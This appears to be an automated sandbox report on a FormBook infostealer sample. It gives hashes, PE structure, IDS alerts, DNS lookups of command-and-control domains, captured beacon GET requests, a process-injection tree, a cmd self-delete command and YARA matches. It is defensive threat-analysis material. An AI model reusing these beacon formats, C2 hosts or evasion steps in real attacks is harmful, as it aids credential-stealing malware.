Entropy (8bit): 7.977023701616568
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: 8tvMmyxveyzFcnJ.exe
File size: 574'976 bytes
MD5: fff69b0890fc5c9c754e17d06deb5216
SHA1: e3b4644bd7f114a830ec649edbed92a437a81673
SHA256: a8fe32e805d1e0a0a61e2763308b01be24656f9bd356a863b174ce61e32d9a7e
SHA512: a799abf32f8ede0cf805cff84961ded989b899ccfa44214ad17d4a9912ee650cac6f75b1462fbcc465b47397578eecb5f5998ee24c9694bfe2a7929549040088
SSDEEP: 12288:DHch5SCsLxfmoaaKB0eN3lvGIW4CO7MEMVbQsJeo6Bcd0Xp4e:zIfQHNKB0e9luIybQKXLd0m
TLSH: A9C42344B7E8D786F96A9334029FAB010B353D4AE4AADE45DCE710D81D2BF405A92B37
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....eD...............0.............F.... ........@.. ....................... ............@................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x48db46
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0xE84465C2 [Thu Jun 25 19:30:10 2093 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
            Instruction
            jmp dword ptr [00402000h]
            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8daf4 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8e000 | 0x5b4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x90000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8c450 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x8bb4c | 0x8bc00 | 14375216bc51e2d92f7b470c8cf1dfef | False | 0.9766341262298748 | data | 7.982529796574812 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x8e000 | 0x5b4 | 0x600 | 62081b28fd455e530dcb6e5a73f2dd7d | False | 0.4303385416666667 | data | 4.115698753386909 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x90000 | 0xc | 0x200 | c9c1c03f94044dbfbf9a1c8b1edc6b75 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x8e090 | 0x324 | data | | | 0.44154228855721395
RT_MANIFEST | 0x8e3c4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/10/24-12:11:01.020125 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50630 | 80 | 192.168.2.4 | 3.64.163.50
07/10/24-12:13:25.925017 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50634 | 80 | 192.168.2.4 | 198.185.159.144
07/10/24-12:11:21.261447 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50631 | 80 | 192.168.2.4 | 103.224.212.213
07/10/24-12:11:42.251746 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50632 | 80 | 192.168.2.4 | 103.191.209.34
07/10/24-12:10:40.094311 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49743 | 80 | 192.168.2.4 | 188.114.97.3
07/10/24-12:12:01.865030 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50633 | 80 | 192.168.2.4 | 3.33.130.190
TCP Packets: Timestamp | Source Port | Dest Port | Source IP | Dest IP (per-packet listing omitted)
UDP Packets: Timestamp | Source Port | Dest Port | Source IP | Dest IP (per-packet listing omitted)
            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
            Jul 10, 2024 12:09:40.065268040 CEST | 192.168.2.4 | 1.1.1.1 | 0xd319 | Standard query (0) | www.basedawgz.live | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:09:59.876291037 CEST | 192.168.2.4 | 1.1.1.1 | 0xb570 | Standard query (0) | www.thecollisionmagazine.com | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:10:40.050688982 CEST | 192.168.2.4 | 1.1.1.1 | 0x390b | Standard query (0) | www.291van.fun | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:11:00.504188061 CEST | 192.168.2.4 | 1.1.1.1 | 0x5bad | Standard query (0) | www.motolimod.com | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:11:20.923656940 CEST | 192.168.2.4 | 1.1.1.1 | 0x9fab | Standard query (0) | www.at89v2.com | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:11:41.376701117 CEST | 192.168.2.4 | 1.1.1.1 | 0x1b7b | Standard query (0) | www.sainikshiksha.com | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:12:01.830740929 CEST | 192.168.2.4 | 1.1.1.1 | 0x3212 | Standard query (0) | www.fondsa.xyz | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:12:22.373477936 CEST | 192.168.2.4 | 1.1.1.1 | 0xd729 | Standard query (0) | www.huttonsidel.online | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:12:42.857923031 CEST | 192.168.2.4 | 1.1.1.1 | 0x3e9e | Standard query (0) | www.llngx.com | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:12:43.862828016 CEST | 192.168.2.4 | 1.1.1.1 | 0x3e9e | Standard query (0) | www.llngx.com | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:12:44.877207994 CEST | 192.168.2.4 | 1.1.1.1 | 0x3e9e | Standard query (0) | www.llngx.com | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:12:46.902784109 CEST | 192.168.2.4 | 1.1.1.1 | 0x3e9e | Standard query (0) | www.llngx.com | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:13:03.397139072 CEST | 192.168.2.4 | 1.1.1.1 | 0xa372 | Standard query (0) | www.ajansyapai.net | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:13:25.860891104 CEST | 192.168.2.4 | 1.1.1.1 | 0x1d62 | Standard query (0) | www.tatesfluffyfrenchies.com | A (IP address) | IN (0x0001) | false
            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
            Jul 10, 2024 12:09:40.514588118 CEST | 1.1.1.1 | 192.168.2.4 | 0xd319 | Name error (3) | www.basedawgz.live | none | none | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:09:59.897070885 CEST | 1.1.1.1 | 192.168.2.4 | 0xb570 | Name error (3) | www.thecollisionmagazine.com | none | none | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:10:40.086332083 CEST | 1.1.1.1 | 192.168.2.4 | 0x390b | No error (0) | www.291van.fun |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:10:40.086332083 CEST | 1.1.1.1 | 192.168.2.4 | 0x390b | No error (0) | www.291van.fun |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:11:21.255609989 CEST | 1.1.1.1 | 192.168.2.4 | 0x9fab | No error (0) | www.at89v2.com |  | 103.224.212.213 | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:11:42.218935013 CEST | 1.1.1.1 | 192.168.2.4 | 0x1b7b | No error (0) | www.sainikshiksha.com | sainikshiksha.com |  | CNAME (Canonical name) | IN (0x0001) | false
            Jul 10, 2024 12:11:42.218935013 CEST | 1.1.1.1 | 192.168.2.4 | 0x1b7b | No error (0) | sainikshiksha.com |  | 103.191.209.34 | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:12:01.850331068 CEST | 1.1.1.1 | 192.168.2.4 | 0x3212 | No error (0) | www.fondsa.xyz | fondsa.xyz |  | CNAME (Canonical name) | IN (0x0001) | false
            Jul 10, 2024 12:12:01.850331068 CEST | 1.1.1.1 | 192.168.2.4 | 0x3212 | No error (0) | fondsa.xyz |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:12:01.850331068 CEST | 1.1.1.1 | 192.168.2.4 | 0x3212 | No error (0) | fondsa.xyz |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:12:22.384119987 CEST | 1.1.1.1 | 192.168.2.4 | 0xd729 | Name error (3) | www.huttonsidel.online | none | none | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:12:48.722023964 CEST | 1.1.1.1 | 192.168.2.4 | 0x3e9e | Server failure (2) | www.llngx.com | none | none | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:12:48.722038984 CEST | 1.1.1.1 | 192.168.2.4 | 0x3e9e | Server failure (2) | www.llngx.com | none | none | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:12:48.722381115 CEST | 1.1.1.1 | 192.168.2.4 | 0x3e9e | Server failure (2) | www.llngx.com | none | none | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:12:48.723553896 CEST | 1.1.1.1 | 192.168.2.4 | 0x3e9e | Server failure (2) | www.llngx.com | none | none | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:13:03.408982038 CEST | 1.1.1.1 | 192.168.2.4 | 0xa372 | Name error (3) | www.ajansyapai.net | none | none | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:13:25.919226885 CEST | 1.1.1.1 | 192.168.2.4 | 0x1d62 | No error (0) | www.tatesfluffyfrenchies.com | ext-sq.squarespace.com |  | CNAME (Canonical name) | IN (0x0001) | false
            Jul 10, 2024 12:13:25.919226885 CEST | 1.1.1.1 | 192.168.2.4 | 0x1d62 | No error (0) | ext-sq.squarespace.com |  | 198.185.159.144 | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:13:25.919226885 CEST | 1.1.1.1 | 192.168.2.4 | 0x1d62 | No error (0) | ext-sq.squarespace.com |  | 198.49.23.145 | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:13:25.919226885 CEST | 1.1.1.1 | 192.168.2.4 | 0x1d62 | No error (0) | ext-sq.squarespace.com |  | 198.185.159.145 | A (IP address) | IN (0x0001) | false
            Jul 10, 2024 12:13:25.919226885 CEST | 1.1.1.1 | 192.168.2.4 | 0x1d62 | No error (0) | ext-sq.squarespace.com |  | 198.49.23.144 | A (IP address) | IN (0x0001) | false
            • www.291van.fun
            • www.motolimod.com
            • www.at89v2.com
            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.4 | 49743 | 188.114.97.3 | 80 | 2580 | C:\Windows\explorer.exe
            Timestamp | Bytes transferred | Direction | Data
            Jul 10, 2024 12:10:40.094310999 CEST | 155 | OUT | GET /mc10/?M6=0jqVw3fXhgUe9S01oU54GSyQct+tyOMGPM4Q+l1hxxFHWjnqq7dqR8wNeV12RES6q9dV&sZ=Ynzp6xUh HTTP/1.1
            Host: www.291van.fun
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.4 | 50630 | 3.64.163.50 | 80 | 2580 | C:\Windows\explorer.exe
            Timestamp | Bytes transferred | Direction | Data
            Jul 10, 2024 12:11:01.020124912 CEST | 158 | OUT | GET /mc10/?M6=vFB2baQv3F/rJ4Poxnbh3E5xW9PPAAbphga1xIFZj8yJGRkxzOANKPapIG+pOmwhUo5D&sZ=Ynzp6xUh HTTP/1.1
            Host: www.motolimod.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
            Jul 10, 2024 12:11:02.288122892 CEST | 291 | IN | HTTP/1.1 410 Gone
            Server: openresty
            Date: Wed, 10 Jul 2024 10:11:01 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 64 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6f 74 6f 6c 69 6d 6f 64 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 7<html>9 <head>4d <meta http-equiv='refresh' content='0; url=http://www.motolimod.com/' />a </head>8</html>0
            Jul 10, 2024 12:11:02.288314104 CEST | 291 | IN | HTTP/1.1 410 Gone
            Server: openresty
            Date: Wed, 10 Jul 2024 10:11:01 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 64 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6f 74 6f 6c 69 6d 6f 64 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 7<html>9 <head>4d <meta http-equiv='refresh' content='0; url=http://www.motolimod.com/' />a </head>8</html>0


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            2 | 192.168.2.4 | 50631 | 103.224.212.213 | 80 | 2580 | C:\Windows\explorer.exe
            Timestamp | Bytes transferred | Direction | Data
            Jul 10, 2024 12:11:21.261446953 CEST | 155 | OUT | GET /mc10/?M6=+PshiMmsD3s2EuJ9KF3baeU+rJnvgbutDGTUYWD/T/xNi6HtTgrR7YeDwlLM6QRR03T9&sZ=Ynzp6xUh HTTP/1.1
            Host: www.at89v2.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:



            Target ID:0
            Start time:06:08:59
            Start date:10/07/2024
            Path:C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"
            Imagebase:0x7a0000
            File size:574'976 bytes
            MD5 hash:FFF69B0890FC5C9C754E17D06DEB5216
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:low
            Has exited:true

            Target ID:2
            Start time:06:09:02
            Start date:10/07/2024
            Path:C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"
            Imagebase:0x180000
            File size:574'976 bytes
            MD5 hash:FFF69B0890FC5C9C754E17D06DEB5216
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:3
            Start time:06:09:02
            Start date:10/07/2024
            Path:C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"
            Imagebase:0x850000
            File size:574'976 bytes
            MD5 hash:FFF69B0890FC5C9C754E17D06DEB5216
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:low
            Has exited:true

            Target ID:4
            Start time:06:09:02
            Start date:10/07/2024
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\Explorer.EXE
            Imagebase:0x7ff72b770000
            File size:5'141'208 bytes
            MD5 hash:662F4F92FDE3557E86D110526BB578D5
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000004.00000002.4157684455.000000000F8A5000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            Reputation:high
            Has exited:false

            Target ID:5
            Start time:06:09:05
            Start date:10/07/2024
            Path:C:\Windows\SysWOW64\autofmt.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\SysWOW64\autofmt.exe"
            Imagebase:0xb90000
            File size:822'272 bytes
            MD5 hash:C72D80A976B7EB40534E8464957A979F
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            Target ID:6
            Start time:06:09:05
            Start date:10/07/2024
            Path:C:\Windows\SysWOW64\netsh.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\SysWOW64\netsh.exe"
            Imagebase:0x1560000
            File size:82'432 bytes
            MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:high
            Has exited:false

            Target ID:7
            Start time:06:09:08
            Start date:10/07/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:/c del "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"
            Imagebase:0x240000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:8
            Start time:06:09:08
            Start date:10/07/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true


              Execution Graph

              Execution Coverage:11.8%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:4.7%
              Total number of Nodes:192
              Total number of Limit Nodes:20

              Control-flow Graph

              APIs
              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0749D646
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: 28e076635467d96318c83c3d4e5d67bd2abee3b04b51f236aa5987633fbc49bc
              • Instruction ID: cef66778235114d0d82b379d1f7ff123bb68edd76c7cff7d15d71714fd365652
              • Opcode Fuzzy Hash: 28e076635467d96318c83c3d4e5d67bd2abee3b04b51f236aa5987633fbc49bc
              • Instruction Fuzzy Hash: C8916DB1E0061ADFDF14DF68C940BDEBBB2BF48314F1485AAD849A7240DB749985CF92

              Control-flow Graph

              APIs
              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0749D646
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: 88801660c0b200b734457ee6085eabc2edea6a0b4d63b96b1201c0a6cf8ec099
              • Instruction ID: 3256b8d0c26914b5331863b6b6375c0ce28ad12f631c87b0e3ce013282de6bc1
              • Opcode Fuzzy Hash: 88801660c0b200b734457ee6085eabc2edea6a0b4d63b96b1201c0a6cf8ec099
              • Instruction Fuzzy Hash: 01916DB1E0061ADFDF14CF68C9407EEBBB2BF48314F1485AAD849A7240DB749985CF92

              Control-flow Graph (legend: Executed / Not Executed; graph rendering omitted)
              APIs
              • GetModuleHandleW.KERNELBASE(00000000), ref: 0297B386
              Memory Dump Source
              • Source File: 00000000.00000002.1700878260.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2970000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: HandleModule
              • String ID:
              • API String ID: 4139908857-0
              • Opcode ID: a9a60823d183f401612d56ca27235c795a669e7da19dc4137b946209dc410758
              • Instruction ID: a4a5c75132dbc3bcb1174e3cac0d772b19600b531fdd9adfaccb3ad5cd15ebe4
              • Opcode Fuzzy Hash: a9a60823d183f401612d56ca27235c795a669e7da19dc4137b946209dc410758
              • Instruction Fuzzy Hash: F57143B0A00B058FD724DF69D55575ABBF6FF88308F008A2DE08ADBA50DB34E945CB90

              Control-flow Graph (legend: Executed / Not Executed; graph rendering omitted)
              APIs
              • CallWindowProcW.USER32(?,?,?,?,?), ref: 050C4381
              Memory Dump Source
              • Source File: 00000000.00000002.1703155717.00000000050C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_50c0000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: CallProcWindow
              • String ID:
              • API String ID: 2714655100-0
              • Opcode ID: 31f3be69c70676d486650a763c06925e8f415de708c5ee7d617f903e09b91b5c
              • Instruction ID: 50527f70274e54092af1d0e23b923cd3869d2979371573d4a8a31144a5b88a49
              • Opcode Fuzzy Hash: 31f3be69c70676d486650a763c06925e8f415de708c5ee7d617f903e09b91b5c
              • Instruction Fuzzy Hash: 5C4108B49002058FCB14CF99D898AAEBBF5FB89315F24C599D519AB321D774A841CFA0

              Control-flow Graph (legend: Executed / Not Executed; graph rendering omitted)
              APIs
              • CreateActCtxA.KERNEL32(?), ref: 029759C9
              Memory Dump Source
              • Source File: 00000000.00000002.1700878260.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2970000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: Create
              • String ID:
              • API String ID: 2289755597-0
              • Opcode ID: 645cc956e53ba90ba7f7ec719087223fe77232e00d49ce9b1f28a00452cf8311
              • Instruction ID: ece1b6ce2bdcd407077b1ddc9982ff4b4b5e9ff43f0a801278c0a7f1558870c9
              • Opcode Fuzzy Hash: 645cc956e53ba90ba7f7ec719087223fe77232e00d49ce9b1f28a00452cf8311
              • Instruction Fuzzy Hash: AA41D2B0C00719CFDB24CFAAC884B9DBBF5BF49304F6480AAD408AB255DB755945CF90

              Control-flow Graph (legend: Executed / Not Executed; graph rendering omitted)
              APIs
              • CreateActCtxA.KERNEL32(?), ref: 029759C9
              Memory Dump Source
              • Source File: 00000000.00000002.1700878260.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
              Joe Sandbox IDA Plugin
